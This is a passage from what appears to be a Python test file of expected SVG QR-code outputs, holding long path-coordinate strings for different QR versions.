21.6 L 39.6 23.4 L 41.4 23.4 L 41.4 21.6 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 14.4 23.4 L 14.4 25.2 L 16.2 25.2 L 16.2 23.4 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 23.4 34.2 L 23.4 36.0 L 25.2 36.0 L 25.2 34.2 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 25.2 28.8 L 25.2 30.6 L 27.0 30.6 L 27.0 28.8 z M 21.6 43.2 L 21.6 45.0 L 23.4 45.0 L 23.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 23.4 37.8 L 23.4 39.6 L 25.2 39.6 L 25.2 37.8 z M 34.2 39.6 L 34.2 41.4 L 36.0 41.4 L 36.0 39.6 z M 32.4 32.4 L 32.4 34.2 L 34.2 34.2 L 34.2 32.4 z M 41.4 25.2 L 41.4 27.0 L 43.2 27.0 L 43.2 25.2 z M 34.2 34.2 L 34.2 36.0 L 36.0 36.0 L 36.0 34.2 z M 30.6 27 L 30.6 28.8 L 32.4 28.8 L 32.4 27 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 37.8 41.4 L 37.8 43.2 L 39.6 43.2 L 39.6 41.4 z M 14.4 32.4 L 14.4 34.2 L 16.2 34.2 L 16.2 32.4 z M 25.2 9 L 25.2 10.8 L 27.0 10.8 L 27.0 9 z M 21.6 37.8 L 21.6 39.6 L 23.4 39.6 L 23.4 37.8 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 41.4 43.2 L 41.4 45.0 L 43.2 45.0 L 43.2 43.2 z M 37.8 14.4 L 37.8 16.2 L 39.6 16.2 L 39.6 14.4 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 34.2 37.8 L 34.2 39.6 L 36.0 39.6 L 36.0 37.8 z M 18 
41.4 L 18 43.2 L 19.8 43.2 L 19.8 41.4 z M 28.8 34.2 L 28.8 36.0 L 30.6 36.0 L 30.6 34.2 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 37.8 23.4 L 37.8 25.2 L 39.6 25.2 L 39.6 23.4 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 12.6 21.6 L 12.6 23.4 L 14.4 23.4 L 14.4 21.6 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
result_version_2 = """<svg height="59.4mm" version="1.1" viewBox="0 0 59.4 59.4" width="59.4mm" xmlns="http://www.w3.org/2000/svg"><path d="M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 27 27 L 27 28.8 L 28.8 28.8 L 28.8 27 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 36 23.4 L 36 25.2 L 37.8 25.2 L 37.8 23.4 z M 43.2 43.2 L 43.2 45.0 L 45.0 45.0 L 45.0 43.2 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 37.8 43.2 L 37.8 45.0 L 39.6 45.0 L 39.6 43.2 z M 34.2 9 L 34.2 10.8 L 36.0 10.8 L 36.0 9 z M 50.4 14.4 L 50.4 16.2 L 52.2 16.2 L 52.2 14.4 z M 45 23.4 L 45 25.2 L 46.8 25.2 L 46.8 23.4 z M 10.8 46.8 L 10.8 48.6 L 12.6 48.6 L 12.6 46.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 46.8 18 L 46.8 19.8 L 48.6 19.8 L 48.6 18 z M 45 18 L 45 19.8 L 46.8 19.8 L 46.8 18 z M 9 27 L 9 28.8 L 10.8 28.8 L 10.8 27 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 12.6 50.4 L 12.6 52.2 L 14.4 52.2 L 14.4 50.4 z M 21.6 50.4 L 21.6 52.2 L 23.4 52.2 L 23.4 50.4 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 23.4 45 L 23.4 46.8 L 25.2 46.8 L 25.2 45 z M 36 12.6 L 36 14.4 L 37.8 14.4 L 37.8 12.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 16.2 39.6 L 16.2 41.4 L 18.0 41.4 L 18.0 39.6 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 32.4 39.6 L 32.4 41.4 L 34.2 41.4 L 34.2 39.6 z M 25.2 39.6 L 25.2 41.4 L 27.0 41.4 L 27.0 39.6 z M 27 46.8 L 27 48.6 L 28.8 48.6 L 28.8 46.8 z M 34.2 27 L 34.2 28.8 L 36.0 28.8 L 36.0 27 z M 50.4 32.4 L 50.4 34.2 L 52.2 34.2 L 52.2 32.4 z M 30.6 19.8 L 30.6 21.6 L 32.4 21.6 L 32.4 19.8 z M 28.8 37.8 L 28.8 39.6 L 30.6 39.6 L 30.6 37.8 z M 39.6 23.4 L 39.6 25.2 L 41.4 25.2 L 41.4 23.4 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 50.4 9 L 50.4 10.8 L 52.2 10.8 L 52.2 9 z M 34.2 14.4 L 34.2 16.2 L 36.0 16.2 L 36.0 14.4 z M 45 28.8 L 45 30.6 L 46.8 30.6 L 46.8 28.8 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 30.6 43.2 L 30.6 45.0 L 32.4 45.0 L 32.4 43.2 z M 39.6 43.2 L 39.6 45.0 L 41.4 45.0 L 41.4 43.2 z M 46.8 12.6 L 46.8 14.4 L 48.6 14.4 L 48.6 12.6 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 21.6 10.8 L 21.6 12.6 L 23.4 12.6 L 23.4 10.8 z M 25.2 30.6 L 25.2 32.4 L 27.0 32.4 L 27.0 30.6 z M 23.4 12.6 L 23.4 14.4 L 25.2 14.4 L 25.2 12.6 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 16.2 50.4 L 16.2 52.2 L 18.0 52.2 L 18.0 50.4 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 25.2 50.4 L 25.2 52.2 L 27.0 52.2 L 27.0 50.4 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 50.4 50.4 L 50.4 52.2 L 52.2 52.2 L 52.2 50.4 z M 18 48.6 L 18 50.4 L 19.8 50.4 L 19.8 48.6 z M 43.2 41.4 L 43.2 43.2 L 45.0 43.2 L 45.0 41.4 z M 41.4 30.6 L 41.4 32.4 L 43.2 32.4 L 43.2 30.6 z M 25.2 48.6 L 25.2 50.4 L 27.0 50.4 L 27.0 48.6 z M 34.2 32.4 L 34.2 34.2 L 36.0 34.2 L 36.0 32.4 z M 45 36 L 45 37.8 L 46.8 37.8 L 46.8 36 z M 30.6 25.2 L 30.6 27.0 L 32.4 27.0 L 32.4 25.2 z M 36 41.4 L 36 43.2 L 37.8 43.2 L 37.8 41.4 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 45 34.2 L 45 36.0 L 46.8 36.0 L 46.8 34.2 z M 30.6 48.6 L 30.6 50.4 L 32.4 50.4 L 32.4 48.6 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 23.4 23.4 L 23.4 25.2 L 25.2 25.2 L 25.2 23.4 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 21.6 39.6 L 21.6 41.4 L 23.4 41.4 L 23.4 39.6 z M 32.4 45 L 32.4 46.8 L 34.2 46.8 L 34.2 45 z M 14.4 45 L 14.4 46.8 L 16.2 46.8 L 16.2 45 z M 41.4 48.6 L 41.4 50.4 L 43.2 50.4 L 43.2 48.6 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 
41.4 z M 19.8 21.6 L 19.8 23.4 L 21.6 23.4 L 21.6 21.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 30.6 7.2 L 30.6 9.0 L 32.4 9.0 L 32.4 7.2 z M 28.8 21.6 L 28.8 23.4 L 30.6 23.4 L 30.6 21.6 z M 41.4 21.6 L 41.4 23.4 L 43.2 23.4 L 43.2 21.6 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 27 36 L 27 37.8 L 28.8 37.8 L 28.8 36 z M 50.4 21.6 L 50.4 23.4 L 52.2 23.4 L 52.2 21.6 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 30.6 30.6 L 30.6 32.4 L 32.4 32.4 L 32.4 30.6 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 36 36 L 36 37.8 L 37.8 37.8 L 37.8 36 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 7.2 32.4 L 7.2 34.2 L 9.0 34.2 L 9.0 32.4 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 48.6 46.8 L 48.6 48.6 L 50.4 48.6 L 50.4 46.8 z M 45 10.8 L 45 12.6 L 46.8 12.6 L 46.8 10.8 z M 46.8 23.4 L 46.8 25.2 L 48.6 25.2 L 48.6 23.4 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 28.8 10.8 L 28.8 12.6 L 30.6 12.6 L 30.6 10.8 z M 7.2 45 L 7.2 46.8 L 9.0 46.8 L 9.0 45 z M 36 25.2 L 36 27.0 L 37.8 27.0 L 37.8 25.2 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 19.8 34.2 L 19.8 36.0 L 21.6 36.0 L 21.6 34.2 z M 50.4 39.6 L 50.4 41.4 L 52.2 41.4 L 52.2 39.6 z M 43.2 45 L 43.2 46.8 L 45.0 46.8 L 45.0 45 z M 39.6 16.2 L 39.6 18.0 L 41.4 18.0 L 41.4 16.2 z M 9 36 L 9 37.8 L 10.8 37.8 L 10.8 36 z M 34.2 7.2 L 34.2 9.0 L 36.0 9.0 L 36.0 7.2 z M 50.4 16.2 L 50.4 18.0 L 52.2 18.0 L 52.2 16.2 z M 30.6 36 L 30.6 37.8 L 32.4 37.8 L 32.4 36 z M 43.2 7.2 L 43.2 9.0 L 45.0 9.0 L 45.0 7.2 z M 7.2 50.4 L 7.2 52.2 L 9.0 52.2 L 9.0 50.4 z M 39.6 36 L 39.6 37.8 L 41.4 37.8 L 41.4 36 z M 28.8 50.4 L 28.8 52.2 L 30.6 52.2 L 30.6 50.4 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 9 25.2 L 9 27.0 L 10.8 27.0 L 10.8 25.2 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 48.6 18 L 48.6 19.8 L 50.4 19.8 L 50.4 18 z M 46.8 25.2 L 46.8 27.0 L 48.6 27.0 L 48.6 25.2 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 25.2 14.4 L 25.2 16.2 L 27.0 16.2 L 27.0 14.4 z M 36 14.4 L 36 16.2 L 37.8 16.2 L 37.8 14.4 z M 32.4 41.4 L 32.4 43.2 L 34.2 43.2 L 34.2 41.4 z M 28.8 19.8 L 28.8 21.6 L 30.6 21.6 L 30.6 19.8 z M 27 23.4 L 27 25.2 L 28.8 25.2 L 28.8 23.4 z M 25.2 41.4 L 25.2 43.2 L 27.0 43.2 L 27.0 41.4 z M 7.2 39.6 L 7.2 41.4 L 9.0 41.4 L 9.0 39.6 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 28.8 39.6 L 28.8 41.4 L 30.6 41.4 L 30.6 39.6 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 50.4 10.8 L 50.4 12.6 L 52.2 12.6 L 52.2 10.8 z M 37.8 46.8 L 37.8 48.6 L 39.6 48.6 L 39.6 46.8 z M 45 27 L 45 28.8 L 46.8 28.8 L 46.8 27 z M 10.8 50.4 L 10.8 52.2 L 12.6 52.2 L 12.6 50.4 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 46.8 7.2 L 46.8 9.0 L 48.6 9.0 L 48.6 7.2 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 12.6 46.8 L 12.6 48.6 L 14.4 48.6 L 14.4 46.8 z M 21.6 46.8 L 21.6 48.6 L 23.4 48.6 L 23.4 46.8 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 27 12.6 L 27 14.4 L 28.8 14.4 L 28.8 12.6 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 50.4 28.8 L 50.4 30.6 L 52.2 30.6 L 52.2 28.8 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 45 37.8 L 45 39.6 L 46.8 39.6 L 46.8 37.8 z M 43.2 34.2 L 43.2 36.0 L 45.0 36.0 L 45.0 34.2 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 45 32.4 L 45 34.2 L 46.8 34.2 L 46.8 32.4 z M 12.6 
34.2 L 12.6 36.0 L 14.4 36.0 L 14.4 34.2 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 46.8 30.6 L 46.8 32.4 L 48.6 32.4 L 48.6 30.6 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 10.8 21.6 L 10.8 23.4 L 12.6 23.4 L 12.6 21.6 z M 23.4 21.6 L 23.4 23.4 L 25.2 23.4 L 25.2 21.6 z M 21.6 7.2 L 21.6 9.0 L 23.4 9.0 L 23.4 7.2 z M 16.2 30.6 L 16.2 32.4 L 18.0 32.4 L 18.0 30.6 z M 12.6 45 L 12.6 46.8 L 14.4 46.8 L 14.4 45 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 36 45 L 36 46.8 L 37.8 46.8 L 37.8 45 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 14.4 46.8 L 14.4 48.6 L 16.2 48.6 L 16.2 46.8 z M 27 32.4 L 27 34.2 L 28.8 34.2 L 28.8 32.4 z M 34.2 41.4 L 34.2 43.2 L 36.0 43.2 L 36.0 41.4 z M 50.4 46.8 L 50.4 48.6 L 52.2 48.6 L 52.2 46.8 z M 43.2 37.8 L 43.2 39.6 L 45.0 39.6 L 45.0 37.8 z M 27 41.4 L 27 43.2 L 28.8 43.2 L 28.8 41.4 z M 39.6 9 L 39.6 10.8 L 41.4 10.8 L 41.4 9 z M 50.4 23.4 L 50.4 25.2 L 52.2 25.2 L 52.2 23.4 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 45 43.2 L 45 45.0 L 46.8 45.0 L 46.8 43.2 z M 39.6 28.8 L 39.6 30.6 L 41.4 30.6 L 41.4 28.8 z M 9 32.4 L 9 34.2 L 10.8 34.2 L 10.8 32.4 z M 46.8 32.4 L 46.8 34.2 L 48.6 34.2 L 48.6 32.4 z M 14.4 30.6 L 14.4 32.4 L 16.2 32.4 L 16.2 30.6 z M 10.8 30.6 L 10.8 32.4 L 12.6 32.4 L 12.6 30.6 z M 23.4 27 L 23.4 28.8 L 25.2 28.8 L 25.2 27 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 14.4 50.4 L 14.4 52.2 L 16.2 52.2 L 16.2 50.4 z M 23.4 50.4 L 23.4 52.2 L 25.2 52.2 L 25.2 50.4 z M 7.2 46.8 L 7.2 48.6 L 9.0 48.6 L 9.0 46.8 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 32.4 25.2 L 32.4 27.0 L 34.2 27.0 L 34.2 25.2 z M 30.6 10.8 L 30.6 12.6 L 32.4 12.6 L 32.4 10.8 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 41.4 18 L 41.4 19.8 L 43.2 19.8 L 43.2 18 z M 39.6 10.8 L 39.6 12.6 L 41.4 12.6 L 41.4 10.8 z M 43.2 46.8 L 43.2 48.6 L 45.0 48.6 L 45.0 46.8 z M 34.2 12.6 L 34.2 14.4 L 36.0 14.4 L 36.0 12.6 z M 50.4 18 L 50.4 19.8 L 52.2 19.8 L 52.2 18 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 46.8 37.8 L 46.8 39.6 L 48.6 39.6 L 48.6 37.8 z M 10.8 43.2 L 10.8 45.0 L 12.6 45.0 L 12.6 43.2 z M 45 48.6 L 45 50.4 L 46.8 50.4 L 46.8 48.6 z M 46.8 14.4 L 46.8 16.2 L 48.6 16.2 L 48.6 14.4 z M 45 14.4 L 45 16.2 L 46.8 16.2 L 46.8 14.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 9 23.4 L 9 25.2 L 10.8 25.2 L 10.8 23.4 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 27 19.8 L 27 21.6 L 28.8 21.6 L 28.8 19.8 z M 36 16.2 L 36 18.0 L 37.8 18.0 L 37.8 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 16.2 36 L 16.2 37.8 L 18.0 37.8 L 18.0 36 z M 34.2 50.4 L 34.2 52.2 L 36.0 52.2 L 36.0 50.4 z M 27 21.6 L 27 23.4 L 28.8 23.4 L 28.8 21.6 z M 41.4 36 L 41.4 37.8 L 43.2 37.8 L 43.2 36 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 18 50.4 L 18 52.2 L 19.8 52.2 L 19.8 50.4 z M 30.6 16.2 L 30.6 18.0 L 32.4 18.0 L 32.4 16.2 z M 28.8 41.4 L 28.8 43.2 L 30.6 43.2 L 30.6 41.4 z M 43.2 50.4 L 43.2 52.2 L 45.0 52.2 L 45.0 50.4 z M 9 39.6 L 9 41.4 L 10.8 41.4 L 10.8 39.6 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 50.4 12.6 L 50.4 14.4 L 52.2 14.4 L 52.2 12.6 z M 45 25.2 L 45 27.0 L 46.8 27.0 L 46.8 25.2 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 30.6 39.6 L 30.6 41.4 L 32.4 41.4 L 32.4 39.6 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 7.2 23.4 L 7.2 25.2 L 9.0 25.2 L 9.0 23.4 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 10.8 14.4 L 10.8 16.2 L 
12.6 16.2 L 12.6 14.4 z M 16.2 23.4 L 16.2 25.2 L 18.0 25.2 L 18.0 23.4 z M 25.2 27 L 25.2 28.8 L 27.0 28.8 L 27.0 27 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 14.4 39.6 L 14.4 41.4 L 16.2 41.4 L 16.2 39.6 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 23.4 46.8 L 23.4 48.6 L 25.2 48.6 L 25.2 46.8 z M 32.4 30.6 L 32.4 32.4 L 34.2 32.4 L 34.2 30.6 z M 18 45 L 18 46.8 L 19.8 46.8 L 19.8 45 z M 28.8 16.2 L 28.8 18.0 L 30.6 18.0 L 30.6 16.2 z M 41.4 34.2 L 41.4 36.0 L 43.2 36.0 L 43.2 34.2 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 34.2 21.6 L 34.2 23.4 L 36.0 23.4 L 36.0 21.6 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 30.6 21.6 L 30.6 23.4 L 32.4 23.4 L 32.4 21.6 z M 50.4 30.6 L 50.4 32.4 L 52.2 32.4 L 52.2 30.6 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 19.8 36 L 19.8 37.8 L 21.6 37.8 L 21.6 36 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 50.4 7.2 L 50.4 9.0 L 52.2 9.0 L 52.2 7.2 z M 28.8 36 L 28.8 37.8 L 30.6 37.8 L 30.6 36 z M 45 30.6 L 45 32.4 L 46.8 32.4 L 46.8 30.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 37.8 36 L 37.8 37.8 L 39.6 37.8 L 39.6 36 z M 30.6 45 L 30.6 46.8 L 32.4 46.8 L 32.4 45 z M 27 50.4 L 27 52.2 L 28.8 52.2 L 28.8 50.4 z M 36 50.4 L 36 52.2 L 37.8 52.2 L 37.8 50.4 z M 46.8 10.8 L 46.8 12.6 L 48.6 12.6 L 48.6 10.8 z M 14.4 23.4 L 14.4 25.2 L 16.2 25.2 L 16.2 23.4 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 48.6 27 L 48.6 28.8 L 50.4 28.8 L 50.4 27 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 27 9 L 27 10.8 L 28.8 10.8 L 28.8 9 z M 23.4 37.8 L 23.4 39.6 L 25.2 39.6 L 25.2 37.8 z M 34.2 39.6 L 34.2 41.4 L 36.0 41.4 L 36.0 39.6 z M 18 46.8 L 18 48.6 L 19.8 48.6 L 19.8 46.8 z M 43.2 39.6 L 43.2 41.4 L 45.0 41.4 L 45.0 39.6 z M 41.4 25.2 L 41.4 27.0 L 43.2 27.0 L 43.2 25.2 z M 50.4 25.2 L 50.4 27.0 L 52.2 27.0 L 52.2 25.2 z M 36 39.6 L 36 41.4 L 37.8 41.4 L 37.8 39.6 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 39.6 30.6 L 39.6 32.4 L 41.4 32.4 L 41.4 30.6 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 48.6 36 L 48.6 37.8 L 50.4 37.8 L 50.4 36 z M 9 50.4 L 9 52.2 L 10.8 52.2 L 10.8 50.4 z M 45 7.2 L 45 9.0 L 46.8 9.0 L 46.8 7.2 z M 30.6 50.4 L 30.6 52.2 L 32.4 52.2 L 32.4 50.4 z M 46.8 50.4 L 46.8 52.2 L 48.6 52.2 L 48.6 50.4 z M 39.6 50.4 L 39.6 52.2 L 41.4 52.2 L 41.4 50.4 z M 21.6 27 L 21.6 28.8 L 23.4 28.8 L 23.4 27 z M 16.2 34.2 L 16.2 36.0 L 18.0 36.0 L 18.0 34.2 z M 25.2 9 L 25.2 10.8 L 27.0 10.8 L 27.0 9 z M 21.6 37.8 L 21.6 39.6 L 23.4 39.6 L 23.4 37.8 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 41.4 43.2 L 41.4 45.0 L 43.2 45.0 L 43.2 43.2 z M 7.2 48.6 L 7.2 50.4 L 9.0 50.4 L 9.0 48.6 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 32.4 27 L 32.4 28.8 L 34.2 28.8 L 34.2 27 z M 18 41.4 L 18 43.2 L 19.8 43.2 L 19.8 41.4 z M 43.2 48.6 L 43.2 50.4 L 45.0 50.4 L 45.0 48.6 z M 41.4 23.4 L 41.4 25.2 L 43.2 25.2 L 43.2 23.4 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 46.8 46.8 L 46.8 48.6 L 48.6 48.6 L 48.6 46.8 z M 45 46.8 L 45 48.6 L 46.8 48.6 L 46.8 46.8 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 10.8 45 L 10.8 46.8 L 12.6 46.8 L 12.6 45 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 45 
12.6 L 45 14.4 L 46.8 14.4 L 46.8 12.6 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 48.6 7.2 L 48.6 9.0 L 50.4 9.0 L 50.4 7.2 z M 46.8 21.6 L 46.8 23.4 L 48.6 23.4 L 48.6 21.6 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
result_version_4 = """<svg height="73.8mm" version="1.1" viewBox="0 0 73.8 73.8" width="73.8mm" xmlns="http://www.w3.org/2000/svg"><path d="M 63 18 L 63 19.8 L 64.8 19.8 L 64.8 18 z M 43.2 52.2 L 43.2 54.0 L 45.0 54.0 L 45.0 52.2 z M 18 57.6 L 18 59.4 L 19.8 59.4 L 19.8 57.6 z M 41.4 14.4 L 41.4 16.2 L 43.2 16.2 L 43.2 14.4 z M 46.8 41.4 L 46.8 43.2 L 48.6 43.2 L 48.6 41.4 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 64.8 10.8 L 64.8 12.6 L 66.6 12.6 L 66.6 10.8 z M 30.6 64.8 L 30.6 66.6 L 32.4 66.6 L 32.4 64.8 z M 23.4 7.2 L 23.4 9.0 L 25.2 9.0 L 25.2 7.2 z M 32.4 63 L 32.4 64.8 L 34.2 64.8 L 34.2 63 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 7.2 37.8 L 7.2 39.6 L 9.0 39.6 L 9.0 37.8 z M 28.8 37.8 L 28.8 39.6 L 30.6 39.6 L 30.6 37.8 z M 52.2 34.2 L 52.2 36.0 L 54.0 36.0 L 54.0 34.2 z M 30.6 43.2 L 30.6 45.0 L 32.4 45.0 L 32.4 43.2 z M 59.4 37.8 L 59.4 39.6 L 61.2 39.6 L 61.2 37.8 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 43.2 64.8 L 43.2 66.6 L 45.0 66.6 L 45.0 64.8 z M 36 7.2 L 36 9.0 L 37.8 9.0 L 37.8 7.2 z M 61.2 36 L 61.2 37.8 L 63.0 37.8 L 63.0 36 z M 41.4 30.6 L 41.4 32.4 L 43.2 32.4 L 43.2 30.6 z M 57.6 64.8 L 57.6 66.6 L 59.4 66.6 L 59.4 64.8 z M 37.8 30.6 L 37.8 32.4 L 39.6 32.4 L 39.6 30.6 z M 19.8 46.8 L 19.8 48.6 L 21.6 48.6 L 21.6 46.8 z M 63 45 L 63 46.8 L 64.8 46.8 L 64.8 45 z M 48.6 41.4 L 48.6 43.2 L 50.4 43.2 L 50.4 41.4 z M 21.6 28.8 L 21.6 30.6 L 23.4 30.6 L 23.4 28.8 z M 64.8 52.2 L 64.8 54.0 L 66.6 54.0 L 66.6 52.2 z M 25.2 32.4 L 25.2 34.2 L 27.0 34.2 L 27.0 32.4 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 